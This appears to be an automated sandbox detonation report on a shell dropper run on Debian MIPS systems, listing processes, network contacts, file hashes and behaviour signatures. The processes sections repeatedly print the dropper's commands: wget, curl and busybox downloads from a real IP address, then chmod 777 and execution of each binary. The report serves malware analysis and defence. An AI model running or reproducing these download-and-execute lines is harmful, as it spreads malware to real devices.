[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/837-1-0xb66fb000-0xb670c044-memory.dmp
memory/861-2-0xb670d000-0xb671e044-memory.dmp
memory/914-3-0xb66da000-0xb66eb044-memory.dmp
memory/920-4-0xb66dc000-0xb66ed044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 02:38
Reported
2024-11-14 02:41
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
Processes
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 02:38
Reported
2024-11-14 02:41
Platform
debian9-mipsel-20240611-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
